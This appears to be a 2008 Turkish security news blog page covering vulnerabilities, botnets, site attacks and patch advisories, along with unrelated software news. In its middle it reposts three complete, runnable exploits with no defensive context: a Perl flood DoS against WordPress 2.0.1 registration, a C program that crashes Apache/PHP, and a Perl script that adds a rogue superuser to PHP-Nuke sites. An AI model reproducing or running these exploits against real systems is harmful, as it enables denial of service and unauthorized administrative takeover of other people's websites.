31 Aralık 2008 Çarşamba

Web Uygulamalarında 2007'nin Top 10 Güvenlik Açıkları

Cenzic güvenlik şirketi 2007'nin 4. çeyreği için web uygulamalarında en popüler 10 güvenlik açığını yayınladı. Rapora göre saldırıların %85'i web uygulamaları, %10'u web server ve %5'i web tarayıcılarına yönelik.

  • Open SSL taşırma açığı - SL_Get_Shared_Ciphers() fonksiyonundan kaynaklanan taşırma açığıyla uzaktan hedef sistem üzerinde kod çalıştırılabiliyor.
  • Java web başlangıç açığı - Özel hazırlanmış bir java applet ile yerel dosyalar üzerinde yazma ve okuma sağlanabiliyor.
  • Adobe Acrobat URI açığı - İçeriğinde zararlı bir bağlantılar içeren bir PDF dosyasının yüklenmesiyle dışarıdan kod çalıştırılması mümkün oluyor.
  • IBM Lotus Notes hafıza taşması - Özel hazırlanmış bir HTML e-postasının çalıştırılmasıyla TagAttributeListCopy() fonksiyonunda bir taşma sağlanıyorbu sayede dışarıdan kod çalıştırmak mümkün olabiliyor.
  • RealPlayer veri doğrulama açığı - Özel olarak hazırlanmış bir sayfanın çalıştırılmasıyla ActiveX denetimi üzerinden, 'ierpplug.dll'de bir taşma sorunu yaratıyor bu sayede dışarıdan kod çalıştırmak mümkün olabiliyor.
  • IBM WebShere Application Server veri doğrulama açığı - Veri doğrulama açığı ile zararlı kodlar hedef kullanıcının çerezlerini etkileyebiliyor. Bu sayede çerezlerin kullanıldığı yerler üzerinden veri hırsızlığı yapmak mümkün.
  • IBM WebShpere veri doğrulama açığı - Veri doğrulama açığı ile zararlı kodlar hedef kullanıcının çerezlerini etkileyebiliyor. Bu sayede çerezlerin kullanıldığı yerler üzerinden veri hırsızlığı yapmak mümkün.
  • PHP hafıza taşmaları - Çeşitli fonksiyonlardaki hatalar yüzünden meydana gelen hafıza taşmalarıyla hedef sistem üzerinde zararlı kod çalıştırmak mümkün.
  • Apache veri doğrulama açığı - Veri doğrulama açığı ile zararlı kodlar hedef kullanıcının çerezlerini etkileyebiliyor. Bu sayede çerezlerin kullanıldığı yerler üzerinden veri hırsızlığı yapmak mümkün.
  • Adobe Flash Player güvenlik açıkları - Cross-site scripting ve benzeri yöntemler ile hedef kullanıcı üzerinde zararlı kodlar çalıştırılabiliyor.
  • Milyonlarca Bilgisayar Botnet'lerin Kontrolünde

    RSA Konferası'nda araştırmasını sunan Joe Stewart, Secureworks malware araştırmacısı, en büyük botnet'lerin bir milyondan fazla bilgisayarı kontrol ettiğini bildirdi. Stewart, 'Storm kendisinin sadece bir gölgesi, Kraken dünyanın en büyük ikinci botnet'i Bobax'ın diğer isimlerinden sadece biri. Hepsinin amacı yarattıkları ordularla internette spam yapmak.' dedi.

    Stewart'ın araştırması en büyük 11 botnet'in detaylarını incelemekte. Buna göre bu 11 botnet ile dünyada 1 milyondan fazla bilgisayar botnet'lerin ordularının birer mensubu ve bu dev ordu hergün 100 milyardan fazla spam yapmakta.

    Listenin en üstünde yer alan Srizbi (diğer isimleriyle Cbeplay ya da Exchanger) 315,000 bota sahip ve bu botlarla günlük 60 milyar mesaj atabiliyor. İkinci sıradaki Bobax ise 185,000 hack'lenmiş sistemiyle günde 9 milyar mesaj atıyor.

    Botnet'lerin izlerini takip etmek
    Joe Stewart araştırmasında botnet'le savaş için en önemli şeyin 'fingerprinting' yani bırakılan izden takip etmek olduğunu belirtti. Bununda en etkili yolunun posta protokollerinde bırakılan izler olduğunu söyledi. 'Fakat bu kolay bir iş değil bunun başarılı olabilmesi için son kullanıcılarında yardımı gerekli. Tüm kullanıcılar botnet ordusunun bir parçası olup olmadığını sürekli kontrol etmeli bu sayede etkilenen bilgisayar sayısı azaltılabilir.' dedi.

    CNN.com Saldırı Altında

    CNN'in web sayfası bir grup Çinli hacker tarafından saldırıya maruz bırakıldı. Dünyanın en fazla ziyaret edilen haber portallarından biri olan Cnn.com'a saldırılar bugün öğlen başladı. Saldırı yapanlar kendilerine 'Revenge of the Flame' diyen bir grup Çinli hacker.

    DDoS saldırılarına maruz kaldığı belirtilen siteye saldırılar bir süre sonra bir anons ile son buldu. Fakat site birkaç saatliğine de olsa ciddi hasar gördü. Bu nedenle Cnn.com asyadan gelen girişleri bir süreliğine kısıtlamak zorunda kaldı.

    Saldırıların son günlerin popüler yöntemi 'iframe' içinde virüs ile yapıldığı belirtildi. Bilgisayar bulaşan virüsler kullanıcıları zombi gibi kullanarak saldırının bir parçası haline getiriyor.

    Bu saldırıda kullanılan trojan hakkında bilgiler,

    DDoS.Win32.Sdattack.A; DDoS.Trojan
    Dosya boyutu: 1510643 bytes
    MD5: ed25e7188e5aa17f6b35496a267be557
    SHA1: 71138f0c0556dde789854398c3c7cde29352662b

    PayPal'de Güvenlik Alarmı

    Dünyanın en büyük para transfer sitelerinden biri olan PayPal'de kullanıcıları tehdit eden ciddi bir güvenlik açığı tespit edildi. Cross-site scripting ile yapılan saldırıyla kullanıcıların giriş bilgilerini ele geçirmek mümkün olabiliyor.

    PayPal'in yeni SSL sistemiyle kullanıcılarına daha fazla güvenlik vaad etmesinden hemen sonra bulunan güvenlik açığı bir çok güvenlik uzmanı tarafından kritik olarak değerlendiriliyor. XSS güvenlik açığını keşfeden Finli güvenlik uzmanı Harry Sintonen, kendi yayınladığı bir ekran görüntüsüyle güvenlik açığını kanıtladı.

    PayPal'e güvenlik açığı ile ilgili bilgi verilmesine karşı hala açık kapatılmış değil. Bu nedenle kullanıcıların bağlantılara tıklarken dikkatli olmaları tavsiye ediliyor.

    Ekran Görüntüsü:

    Facebook'ta XSS

    Dünya'nın en büyük sosyal ağlarından biri olan Facebook'ta XSS keşfedildi. Güvenlik açığı ile birlikte site üzerinden sahte girişler hazırlanabiliyor ya da kullanıcılara zararlı yazılımlar iFrame yoluyla bulaştırılabiliyor.

    Facebook'ta ki bu açıkla birlikte sosyal ağların güvenliği ne kadar önemsedikleri de yeniden tartışma konusu haline geldi. Milyonlarca kişinin kullandığı sosyal ağlarda daha öncede çeşitli güvenlik açıkları keşfedilmişti.

    Zararsız örnek saldırıları XSSED'in sayfasından inceleyebilirsiniz.

    Metasploit Sayfası Hack'lendi

    Ünlü güvenlik araçlarından Metasploit Framework'ün web sayfası geçtiğimiz gün Çinli bir grup hacker tarafından hacklendi. Metasploit'in yaratıcısı H D Moore'un yaptığı açıklamaya göre saldırı ARP Poisoning (Spoofing) olarak bilinen ve sitenin barındığı sunucudan kaynaklanan bir güvenlik açığı ile oluşmuş. Bu sayede siteye girmeye çalışan ziyaretçiler asıl siteye ulaşmak yerine saldırganların belirlediği bir IP'ye ulaşmış.

    Moore, güvenlik açığının router üzerinde yaptığı kodlama ile düzeltildiğini fakat aynı sunucuda bulunan 250 diğer sitenin hala tehlike altında olduğunu belirtti.

    Citibank ATM Ağı Hack'lendi

    New York Times'ın yaptığı habere göre ABD'de Citibank'ın ATM ağına bilinmeyen kişiler tarafından yapılan saldırı sonucu bankanın PIN (kişisel tanımlama numarası) verileri ele geçirilmiş. İstemcilerden kaçının etkilenmiş olduğu bilinmediği gibi bu olayın sonucunda banka milyonlarca doları kaybetmiş olabilir.

    Gartner güvenlik firmasından Avivah Litan olayla ilgili olarak bu tip ağlarda güvenliğin malesef yetersiz olduğunu belirtti. PIN verilerinin transferi sırasında mutlaka katı şifreleme yöntemlerinin kullanılması gerektiğini bildiren Litan, bunun eksikliği yüzünden böyle büyük bir soygunun gerçekleştiğini de sözlerine ekledi.

    Internet Explorer 8.0 - XSS Filter

    XSS (Cross-Site Scripting) saldırıları son yıllarda internet saldırganlarının kullandığı en etkili yöntemlerden biri. Küçük kodlama hatalarından oluşan XSS açıkları hemen hemen her türlü dinamik web sayfasında görülebilmekte. Bu açıklar sayesinde bazen ufak çaplı saldırılar yapılabilirken bazen de XSS üzerinden sitede ciddi hasarlar verilebiliyor.

    Araştırma sonuçlarına göre de en fazla kullanılan saldırı metodu olan XSS için güvenlik yazılımları ve büyük firmalar sürekli çözüm üretmeye çalışıyor. Bunlardan en sonuncusu Microsoft tarafından geliştirilen XSS Filter (XSS Filtresi).

    XSS Filter yeni bir araç değil. İlk defa 2002'de 1.0 versiyonu çıkan XSS Filter bir süre askıya alınmıştı. Özellikle tarayıcı rekabetinin arttığı şu günlerde ise Internet Explorer'ın son sürümünde ciddi bir özellik olarak sunulacak.

    XSS Filter 1.0

    IE 8.0 XSS Filter'ın çalışma mantığı, tarayıcıdan yapılan istekleri site açılmadan önce taramaya dayanıyor. Eğer isteğin içerisinde XSS olabileceği düşünülen kodcuklar varsa kullancıyı uyarıyor böylece potansiyel saldırıların önüne geçiliyor. Bu sistemin diğer tarayıcılarda da yaygınlaşmasıyla XSS saldırılarında ciddi anlamda bir azalma bekleniyor.

    XSS Filter - IE 8.0

    ShadowBot'un Yaratıcısı Yakalandı

    Geçtiğimiz günlerde ciddi zararlara yol açan bir botnet türü olan ShadowBot'un yaratıcısı, programını satmaya çalışırken Hollanda'da yakalandı. 19 yaşında bir Hollandalı olduğu bildirilen programcının yazdığı botnet, Windows Live Messenger üzerinden 150,000 bilgisayarı kontrolü altına aldığı belirtiliyor. Zararlı yazılım bulaşmış kişi farkında olmadan listesindeki herkese bir web bağlantısı yolluyor. Bu bağlantıya tıklayıp istenilen program bilgisayara indirilince kurban da botnet'in bir parçası olmuş oluyor. Bir sistem zaafiyetinden faydalanılmadığı için bu tehlikeden uzak durmak tamamen kullanıcının elinde.

    Habere göre Hollandalı genç yakalanmadan önce botnet'ini 25,000€'ya satmaya çalışıyordu. Botnet'lerin bu kadar değerli olmasının sebebi ise bir botnet ordusu ile birlikte spam mesajlar gönderebilir, çeşitli dolandırıcılık yöntemlerinde kullanabilir ya da web sayfalarına saldırabilirsiniz. Bu tip botnet ya da benzeri zararlı yazılımların artması internette ciddi bir sorun olarak görülmekte. Bu nedenle tüm dünya üzerindeki botnet liderleri uluslararası güvenlik güçleri tarafından sıkı bir takip altında.

    Güvenlik yazılım şirketi Kaspersky ise ShadowBot hakkında detaylı bilgileri ve sistemden nasıl kaldırılabileceğini kendi sayfasında anlattı. Eğer yakın zaman içerisinde benzer bir tehditle karşı karşıya kaldıysanız sayfayı incelemenizi öneriyoruz.

    Hash'ler Yeterince Güvenli mi?

    Uluslararası kriptoloji konferansının bu seneki ayağı olan Crypto 2008, ABD'de gerçekleştirildi. Konferansta en dikkat çekici sunum, Graz Üniversitesinden gelen Avusturyalı kriptoloji uzmanlarının Rus hash standardı olan GOST'a karşı geliştirdikleri saldırı tekniği oldu. Ayrıca ekip SHA-1'in düşük versiyonlarından birinin tersine döndürülebileceğini gösteren bir saldırı da sundu.

    GOST (hash fonksiyonu), GOST standardının bir parçası olarak yine SHA-1 ile benzer zamanlarda (1995) sunulmuştu. Rusya'nın uzay teknolojileri ve benzer bir çok yerde kullandığı standart çok güvenilir olarak kabul ediliyordu.

    Çarpışma (collision) olarak adlandırılan saldırı yöntemi 2005 yılında SHA-1'in kırılmasında da kullanılmıştı. Bu yöntem temelde sadece hash'lerin kırılmasındaki zamanı azaltma ile ilgili. GOST için geliştirilen yöntem ile hash 2^23 kere daha hızlı çözülebiliyor fakat hala 2^105 işlem yapılması gerekiyor ki bu ciddi bir zaman istiyor.

    Buna rağmen önce SHA-1 şimdi de GOST üzerinde bulunan zaafiyetler güvenlik uzmanlarının, şimdiye kadar en iyi güvenlik yöntemi olarak kabul edilen yüksek hash yöntemlerin aslında "yeterince güvenli mi" sorusunu sormalarına neden oluyor.

    GOST hash fonksiyonu için yapılan sunumun pdf dosyasına şuradan ulaşabilirsiniz.

    Facebook'ta Botnet Tehlikesi

    Sosyal ağlarda her gün yeni güvenlik problemleri çıkmaya devam ediyor. Son olarak Foundation for Research and Technology Hellas'ın gösterdiği üzere Facebook'ta uygulamalar (applications) yolu ile ciddi tehditler oluşturulabiliyor. FORTH'un gösterdiği üzere zararsız gibi görünen bazı uygulamalar sizi bir Botnet ağına dahil edebilir.

    Günün Fotoğrafı uygulaması Facebook profilinize her gün National Geographic'ten değişik fotolar ekliyor. Buraya kadar normal ve zararsız görünmekte fakat uygulama bundan daha fazlasını siz farkında olmadan yapıyor. Siz her fotoğrafa tıkladığınızda fotoların değişmesinin yanı sıra uygulamaya konulan gizli kodlar sayesinde sizin bilgisayarınızdan bir HTTP isteği oluşturuluyor. Bu isteğin boyutu 600 KB'ye kadar çıkabiliyor. Yani siz farkında olmadan bir saldırının parçası olmuş oluyorsunuz.

    Güvenlik uzmanları bu ve buna benzer daha tehlikeli saldırıların uygulamalar üzerinden yapılabileceğini belirtiyor. Sosyal ağlardaki esneklik ve buna bağlı olarak kullanıcıların daha fazla sosyal ağları kullanması bu siteleri yöneten kişileri cezbediyor fakat bunun sonucunda oluşan güvenlik zaafiyetleri malesef ikinci planda kalmaya devam etmekte.

    Pardus 2008.1 Hyaena hyaena

    Pardus 2008'in hata düzeltmelerini ve yeni özelliklerini içinde bulunduran Pardus 2008.1 Hyaena hyaena çıktı. Pardus 2008 deki değişikliklerden sonra Hyaena hyaena sürümünde gelişmiş ağ yöneticisine yeni özellikler eklenmiş bunun yanında KDE 3.5.10 ve 4.1.1 tabanlı iki farklı Çalışan CD'yi yerel ve uluslararası olmak üzere iki adet Kurulum CD'si var. Sürüm son eklenen İsveççe ile beraber artık 11 dil destekliyor. Sürüm ismini yine Anadolu canlılarından biri olan ve ender görülen çizgili sırtlandan almış.

    Güncellenen bileşenler
    Pardus 2008.1 sürümü, Pardus teknolojilerindeki yeniliklerin yanında birçok güncellemeyi de içeriyor:

    * Pardus'un öntanımlı masaüstü ortamı olan KDE3 'ün son kararlı sürümü KDE 3.5.10
    * 2.6.25 serisinin son kararlı sürümü olan 2.6.25.16 Linux Çekirdeği ile çok daha fazla donanım desteği, kararlı ve güvenilir sistem,
    * Güncellenmiş Mozilla Firefox 3.0.1, OpenOffice.org 2.4.1.7, KDE 4.1.1 ...
    * Pardus 2008'den beri geçen sürede güncellenen tüm yazılımlar, hata düzeltmeleri, iyileştirmeler,
    * Hataları giderilmiş ve son sürümlerine yükseltilmiş yüzlerce özgür yazılım...

    Pardus 2008.1, tüm bu değişiklikler ile gelişirken her zamanki temel özelliklerini de ihmal etmiyor; tüm masaüstünde Türkçe yazım denetimi, internet araçları, ofis yazılımları, çoklu ortam (resim, müzik, video vb.) oynatıcıları ve sayısız yazılım ile kullanıcılarının tüm gereksinimlerini karşılayacak tek bir CD olarak geliyor...

    Kurulum gereksinimleri
    Pardus 2008.1'i ortalama bir donanımda çalıştırabilirsiniz. Yüksek performans için en az 512 MB RAM (bellek) ve 1200 MHz işlemci öneriyoruz. Pardus 2008.1 için asgari ve tavsiye edilen donanım gereksinimleri aşağıdadır:

    * 256 MB bellek (512 MB tavsiye edilir)
    * 800 MHz Intel ya da AMD işlemci (1200 MHz tavsiye edilir)
    * En az 4 GB boş disk alanı (10 GB tavsiye edilir)

    Pardus.org.tr

    Bozuk Videoları Tamir Edin

    Heyecanla beklediğiniz dizinin yeni bölümünü, tüm codec'lere sahip olmanıza rağmen hiçbir oynatıcıda açamadınız mı? Bir de DivFix++ ile deneyin.

    Hevesle indirdiğiniz videoların açılmayarak o hevesi kursağınızda bırakmasının sebebi genellikle gerekli codec'lerin yüklü olmaması, bazen ise AVI dosyasının bozuk olmasıdır. Eğer dosyada bozunma mevcutsa, çözüm açık kaynaklı bir AVI tamir programı olan DivFix++. Hem komut satırı hem de görsel arayüz ile video dosyalarını tamir etmenizi sağlayan yazılım, seçtiğiniz videoları hatalara karşı tarayarak, istediğiniz şekilde düzeltiyor. Endeks dosyalarında hata olan videoları da tamir eden DivFix++ ile izleyemeyeceğiniz video(video adı altında bir virüs indirmediyseniz) kalmıyor. Yazılımın tüm işletim sistemlerinde kullanılabilmesi ise diğer bir güzellik.

    :: DivFix++ yazılımını ücretsiz indirmek için alttaki linke tıklayın
    http://sourceforge.net/project/showfiles.php?group_id=170344?download

    WordPress 2.0.1 Remote DoS Exploit

    #!perl
    #Greets to all omega-team members + h4cky0u[h4cky0u.org], lessMX6 and all dudes from #DevilDev ;)
    #The exploit was tested on 10 machines but not all got flooded.Only 6/10 got crashed

    use Socket;
    if (@ARGV < 2) { &usage; }
    $rand=rand(10);
    $host = $ARGV[0];
    $dir = $ARGV[1];
    $host =~ s/(http:\/\/)//eg; #no http://
    for ($i=0; $i<9999999999999999999999999999999999999999999999999999999999999999999999; $i++) #0_o :)
    {
    $user="\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x66\x6f\x6f".$rand.$i; #you N33d t0 be l33t t0 s33 th!S !
    $data = "action=register&user_login=$user&user_email=$user\@matrix.org&submit=Register+%C2%BB";
    $len = length $data;
    $foo = "POST ".$dir."wp-register.php HTTP/1.1\r\n".
    "Accept: */*\r\n".
    "Accept-Language: en-gb\r\n".
    "Content-Type: application/x-www-form-urlencoded\r\n".
    "Accept-Encoding: gzip, deflate\r\n".
    "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\r\n".
    "Host: $host\r\n".
    "Content-Length: $len\r\n".
    "Connection: Keep-Alive\r\n".
    "Cache-Control: no-cache\r\n\r\n".
    "$data";
    my $port = "80";
    my $proto = getprotobyname('tcp');
    socket(SOCKET, PF_INET, SOCK_STREAM, $proto);
    connect(SOCKET, sockaddr_in($port, inet_aton($host))) || redo;
    send(SOCKET,"$foo", 0);
    syswrite STDOUT, "+";
    }
    #s33 if the server is down
    print "\n\n";
    system('ping $host');
    sub usage {
    print "\n\t(W)ordpress 2.0.1 (R)emote (D)oS (E)xploit (B)y matrix_killer\n";
    print "\te-mail: matrix_k\@abv.bg\n";
    print "\tusage: \n";
    print "\t$0 \n";
    print "\tex: $0 127.0.0.1 /wordpress/\n";
    print "\tex2: $0 127.0.0.1 / (if there isn't a dir)\n";
    exit();
    };

    Apache+php Proof of Concept Exploit

    /*
    ---------------------------------------------------------------------------
    Web: http://qb0x.net Author: Gabriel A. Maggiotti
    Date: Febrary 03, 2002 E-mail: gmaggiot@ciudad.com.ar
    ---------------------------------------------------------------------------

    Summary
    -------
    This is a proof of concept exploit for Apache/1.3.x + php_4.0.6. This
    code exploit multipart/form-data POST requests bug. This code only crash
    apache deamon, not open any shell or execute code in the remote server.
    PHP supports multipart/form-data POST requests (as described in RFC1867)
    known as POST fileuploads. Unfourtunately there are several flaws in the
    php_mime_split function that could be used by an attacker to execute arbi-
    trary code. I dont know if the vuln I exploit is a known vuln or not.


    ------------------------------------------------------------------------------

    Example:
    -------


    [gabi@pluto logs]$ ./apache_php host 80 hi.php
    [gabi@pluto logs]$ cat /www/logs/error_log

    [Sun Mar 3 02:50:36 2002] [notice] child pid 26856 exit signal Segmentation
    fault (11)

    [gabi@pluto logs]$


    Greets:
    ------
    A special greets to Fernando Oubi#a and Sebastian Brocher, good friend of
    mime.

    An very special greets for a good friend and an excellent Security
    Consultant Alex Hernandez!!!

    */

    #include
    #include
    #include
    #include
    #include
    #include
    #include
    #include
    #include
    #include
    #include
    #include

    #define MAX 1000
    #define PORT 80

    char *str_replace(char *rep, char *orig, char *string)
    {
    int len=strlen(orig);
    char buf[MAX]="";
    char *pt=strstr(string,orig);

    strncpy(buf,string, pt-string );
    strcat(buf,rep);
    strcat(buf,pt+strlen(orig));
    strcpy(string,buf);
    return string;
    }

    int main(int argc,char *argv[MAX])
    {
    int sockfd;
    int numbytes;
    int port;
    char *ptr;

    char POST_REQUEST[MAX] =
    "POST ##file HTTP/1.0\n"
    "Referer: http://host/xxxxxx/exp.php?hi_lames=haha\n"
    "Connection: Keep-Alive\nContent-type: multipart/for"
    "m-data; boundary=---------------------------1354088"
    "10612827886801697150081\nContent-Length: 567\n\n---"
    "--------------------------1354088106128278868016971"
    "50081\nContent-Disposition: form-data; name=\"\x8\"";

    struct hostent *he;
    struct sockaddr_in their_addr;

    if(argc!=4)
    {
    fprintf(stderr,"usage:%s \n",argv[0]);
    exit(1);
    }

    port=atoi(argv[2]);
    ptr=str_replace(argv[3],"##file",POST_REQUEST);
    //ptr=POST_REQUEST;

    if((he=gethostbyname(argv[1]))==NULL)
    {
    perror("gethostbyname");
    exit(1);
    }


    if( (sockfd=socket(AF_INET,SOCK_STREAM,0)) == -1) {
    perror("socket"); exit(1);
    }

    their_addr.sin_family=AF_INET;
    their_addr.sin_port=htons(port);
    their_addr.sin_addr=*((struct in_addr*)he->h_addr);
    bzero(&(their_addr.sin_zero),8);

    if( connect(sockfd,(struct sockaddr*)&their_addr,\
    sizeof(struct sockaddr))==-1)
    {
    perror("connect");
    exit(1);
    }


    if( send(sockfd,ptr,strlen(POST_REQUEST),0) ==-1)
    {
    perror("send");
    exit(0);
    }

    close(sockfd);

    return 0;
    }

    /*
    ---------------------------------------------------------------------------
    research-list@qb0x.net is dedicated to interactively researching vulnerab-
    ilities, report potential or undeveloped holes in any kind of computer system.
    To subscribe to research-list@qb0x.ne t send a blank email to
    research-list-subscribe@qb0x.net. More help available sending an email
    to research-list-help@qb0x.net.
    Note: the list doesn't allow html, it will be stripped from messages.
    ---------------------------------------------------------------------------
    */

    PHP-NUKE all versions add admin exploit

    #!/usr/bin/perl
    use LWP::UserAgent;

    print "========================================\n";
    print " PHP-NUKE all versions add admin exploit\n";
    print " Exploit coded by matrix_killer\n";
    print " Greetz to all omega-team members\n";
    print " See the sourece for more information\n";
    print "========================================\n";


    print "Enter host: "; #example:www.host.org

    my $host=;

    chomp ($host);

    print "Enter username: "; #example:Lamer

    my $user=;

    chomp ($user);

    print "Enter pass: "; #example:lamer

    my $pass=;

    chomp ($pass);

    print "Enter base64 username and md5 hash: ";

    my $base64=;

    chomp ($base64);


    my $ua = new LWP::UserAgent;
    $ua->proxy(['http'] => 'http://192.168.166.167:6588'); #setup here the proxy and the port
    #Change the base64 text to the base 64 username and password
    my $xpl="http://$host/admin.php?op=AddAuthor&add_aid=$user&add_name=God&add_pwd=$pass&add_email=hacked@rooted.com&add_radminsuper=1&admin=$base64";

    my $res = $ua->request(new HTTP::Request POST => $xpl);
    print "DONE !!! Now go to $host/admin.php and login as $user for username and $pass for password\n";

    #For questions send me a e-mail to matrix_k@abv.bg
    #I'm not responsible for the damage that you will make with this exploit.The exploit is wrighten for education purposes only !

    Miranda IM'de Buffer Overflow Açığı

    Buffer overflow : Maksimum sayıdan fazla değer yüklemektir.Bu sayede arta kalan kısımla istenilen bir kod çalıştırılabilir.

    Miranda Instant Messenger 2.0.3.8 sürümünde 'PopUp Plus' eklentisiyle kullanıldığında eğer kullanıcıda 'Use SmileyAdd Setting' özelliği aktif edilmişse kötü niyetli bir kullanıcının göndereceği 530 karakterlik bir mesaj buffer overflow açığının oluşmasına neden olacaktır.

    Çözüm:
    Şuan için bir çözüm bulunmamaktadır.

    Internet Tarayıcılarında Kritik Güvenlik Açıkları

    Tarayıcı ön belleğine dikkat, hacker'lar için bulunmaz nimet demiştik ama tarayıcıların yarattığı tehlikeler devam ediyor. Microsoft Internet Explorer'da ActiveX ve Firefox'da kritik bir güvenlik açığı var. Hemen tarayıcınızı güncellemenizi tavsiye ediyoruz. İşte açıkların detayları ve yamalama linkleri.

    Daha önce sizlerle paylaştığımız, Word’deki dökümanter güvenlik açığı ve Publisher Güvenlik açığının üstünden çok az bir zaman geçmesine rağmen Internet Explorer 6.x Sürümünde kritik bir güvenlik açığı gündeme geldi.

    Internet Explorer’ın Control ActiveX fonksiyonunun hata vermesine neden olan ve kodlama hatasından meydana geldiği bildirilen güvenlik açığı, daxctle.ocx "KeyFrame()" Parametresini etkiliyor. Hacker’lar özel olarak hazırladıkları saldırı kodlarını sıkıştırarak bir web adresine http 302 olarak yönlendiriyor ve Explorer’a URLMON.DLL hatası verdirerek sistem de istedikleri kodları çalıştırabiliyorlar.

    Windows Services Pack 2‘yi de etkileyen güvenlik açığı, Hacker‘ların Exploit‘ler (sızma kodu) yazarak, uzaktan bilinçsiz kullanıcıların sistemlerini ele geçirmeye yönelik saldırılar düzenlemesine neden oluyor.

    Internet Explorer’deki bu kritik güvenlik açığından korunmak için www.microsoft.com/technet/security veya Microsoft Bülteninden yamaları indirebilirsiniz.

    Mozilla / FireFox Çoklu Güvenlik Açıkları ;

    Güvenlik açığı bulunan ve risk taşıyan tarayıcı sadece Microsoft Internet Explorer değil, yanısıra Explorer’ın en büyük rakibi ve kullanımı hızla artan Internet Tarayıcısı FireFox’da da kritik bir güvenlik açığı açıklandı. Mozilla FireFox 0.x ve 1.x Sürümlerini etkileyen çok güvenlik açığı sayesinde hacker’lar ;

    1. Uzaktan Cross site scripting ataklarında bulunabiliyorlar.
    2. JavaScript kodlarındaki zafiyeti kullanarak SSL Protokolünden geçmiş siteler üzerinden saldırılar da bulunabiliyorlar.
    3. Exploit (sızma) kodları ile kullanıcıların bilgisayarlarının sürücülerine zarar verebiliyorlar.
    4. Büyük Ağ’lar üzerinde tehlike yaratabiliyorlar.

    Bu, son zamanların en büyük Mozilla FireFox Güvenlik açığından korunmak için ; 1.5.0.7 Versiyonunu yüklemeniz gerekiyor. www.mozilla.com/firefox adresinden versiyonunuzu yükseltebilirsiniz.

    ICQ 6.x DoS Güvenlik Açığı

    ICQ'da son kullanıcıyı tehdit eden bir güvenlik açığı tespit edildi. Saldırganların güvenlik açığı ile hedef sistemde DoS (denial of service) saldırıları yapması ya da sistemin ele geçirilmesi mümkün olabiliyor. Güvenlik açığının 'format string' hatasından kaynaklandığı ve HTML mesajları alırken ya da iletirken ortaya çıktığı belirtildi.

    Saldırganın özel hazırlanmış bir kodu kullanıcıya göndermesiyle oluşan saldırı ICQ 6 build 6043 versiyonu ve daha eski versiyonlarında geçerliliğini koruyor.

    Çözüm:
    Şuan için herhangi bir yama bulunmamaktır. Güvenlik uzmanları 'sadece izinli listemdeki kullanıcılar mesaj atsın' özelliğinin aktif edilmesini ve güvenilmeyen kullanıcıların listelerden silinmesini tavsiye ediyor. Ayrıca 'bilmediğim kişilerden gelen mesajları açmadan önce bana sor' seçeneğide saldırının engellenmesinde etken olabilir.

    Zaman Çizelgesi:
    2008/02/28 - Güvenlik açığı tespit edildi.
    2008/03/05 - Güvenlik açığı üzerinde güncelleme yapıldı.

    Microsoft Excel Çoklu Güvenlik Açığı

    Özel hazırlanmış .xsl dosyalarıyla, Microsoft Excel'de güvenlik açığı oluşturulduğu bildirildi. Kritik olarak bildirilen güvenlik açığı, dosyanın hedef bilgisayarda aktif edilmesi ile uzaktan kod çalıştırılmasına imkan sağlıyor. Buna göre Excel'de bulunan; veri doğrulama kayıtları, dosya hazırlama sistemi, düzen kayıtları, formüller, zengin metin editörü, bazı düzenleme operatörlerinde hatalar barındırmakta.

    Etkilenenler:

    * Microsoft Office 2000 Service Pack 3 - Excel 2000 Service Pack 3
    * Microsoft Office XP Service Pack 3 - Excel 2002 Service Pack 3
    * Microsoft Office 2003 Service Pack 2 - Excel 2003 Service Pack 2
    * 2007 Microsoft Office System - Excel 2007
    * Microsoft Office Excel Viewer 2003
    * Microsoft Office Compatibility Pack for Word, Excel, and PowerPoint 2007 File Formats
    * Microsoft Office 2004 for Mac
    * Microsoft Office 2008 for Mac

    Çözüm:
    Microsoft güvenlik açığıyla ilgili yamalar yayınladı.

    Excel 2000 SP3:
    http://www.microsoft.com/downloads/details.aspx?FamilyId=f7f90c30-1bfd-4...

    Excel 2002 SP3:
    http://www.microsoft.com/downloads/details.aspx?FamilyId=907f96d5-d1e9-4...

    Excel 2003 SP2:
    http://www.microsoft.com/downloads/details.aspx?FamilyId=296e5f2c-f594-4...

    Excel 2007:
    http://www.microsoft.com/downloads/details.aspx?FamilyId=e7634cb5-9531-4...

    Microsoft Office Excel Viewer 2003:
    http://www.microsoft.com/downloads/details.aspx?FamilyId=280bb2ac-b21a-4...

    Microsoft Office Compatibility Pack for Word, Excel, and PowerPoint 2007 File Formats:
    http://www.microsoft.com/downloads/details.aspx?FamilyId=e9251d71-9098-4...

    Microsoft Office 2004 for Mac:
    http://www.microsoft.com/downloads/details.aspx?FamilyId=95DCEB37-B35F-4...

    Microsoft Office 2008 for Mac:
    http://www.microsoft.com/downloads/details.aspx?FamilyId=8FE8C32A-6D7A-4...

    Zaman Çizelgesi:
    2007/10/17 - Güvenlik açığı üreticiye bildirildi.
    2008/03/11 - Güvenlik açığıyla ilgili ilk bilgiler yayınlandı.

    Safari 3.1 Güvenlik Açıkları

    Web tarayıcı yazılımı Safari'de, 2 adet güvenlik açığı tespit edildi. Güvenlik açıklarıyla kurbanın sistemi üzerinde dinleme ve tehlikeli hatalar yaratılabiliyor. İlk güvenlik açığı kurbanın bilgisayarına çok uzun isime sahip bir dosyayı indirmesiyle oluşabiliyor. Bu sayede hafıza taşması ve sonucunda dışardan kod çalıştırılması mümkün oluyor.

    Diğer güvenlik açığı ise adres bar üzerinde dışarıdan müdahale ile yapılan aldatmaca. Güvenilir bir sayfayı açtığınızı düşünürken aslında arka planda başka bir sayfaya yönlendirilmeniz mümkün olabiliyor.

    Güvenlik açıkları şimdilik 3.1 ve alt sürümler için onaylandı.

    Çözüm:
    İlgili yamalar çıkana kadar güvenmediğiniz sitelere girmeyiniz.

    Referans:
    Juan Pablo Lopez Yacubian

    MS Windows I2O Sürücüsü Güvenlik Açığı

    Windows Xp üzerinde, RAID kontrolleri gibi çeşitli görevleri yapan I2O (i2omgmt.sys) sürücüsünde güvenlik açığı tespit edildi. Güvenlik açığı ile birlikte yerel bilgisayar üzerinde çeşitli bilgilere ulaşmak mümkün.

